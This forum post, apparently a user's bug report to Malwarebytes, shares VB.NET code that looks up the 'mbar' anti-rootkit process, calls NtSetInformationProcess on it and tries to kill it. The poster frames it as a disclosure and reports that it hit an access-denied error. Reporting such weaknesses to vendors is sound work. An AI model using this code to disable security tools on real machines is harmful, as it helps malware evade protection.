Jump to content

Bug / Exploit report


Recommended Posts

Mbam anti-rootkit has been targeted by malware coded within vb.net. Here's how malware can successfully disable MBAM anti-rootkit with around 10 lines of vb.net.

This is simple stuff malwarebytes! Im disappointed!

 

Here's the code:

Try

            Dim s As Integer = 0
            Dim ProcessPriorityClass As Integer = 29
            Dim lpProcessName As String = "mbar" '<--- Mbar is the malwarebytes antirootkit
            For Each x As Process In Process.GetProcessesByName(lpProcessName)
                If NtSetInformationProcess(x.Handle, ProcessPriorityClass, s, Marshal.SizeOf(s)) = 0 Then
                    x.Kill() 'Done.
                    x.Refresh()
                Else
                    x.Kill()
                    x.Refresh()
                End If
            Next
        Catch
            For Each ax As Process In Process.GetProcessesByName("mbar")
                Try
                    ax.Refresh()
                    ax.Kill()
                    ax.CloseMainWindow()
                Catch : End Try 'Most likely the ax.refresh killed of mbar so ax.kill failed with access denied!
            Next
        End Try

This makes an error of unauthorised access on the mbar.exe (Im on the admin account)

PS: Im not wanting any reply just want to make mbam better! Im not arrogant i promise!

screenshot_2018.PNG

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.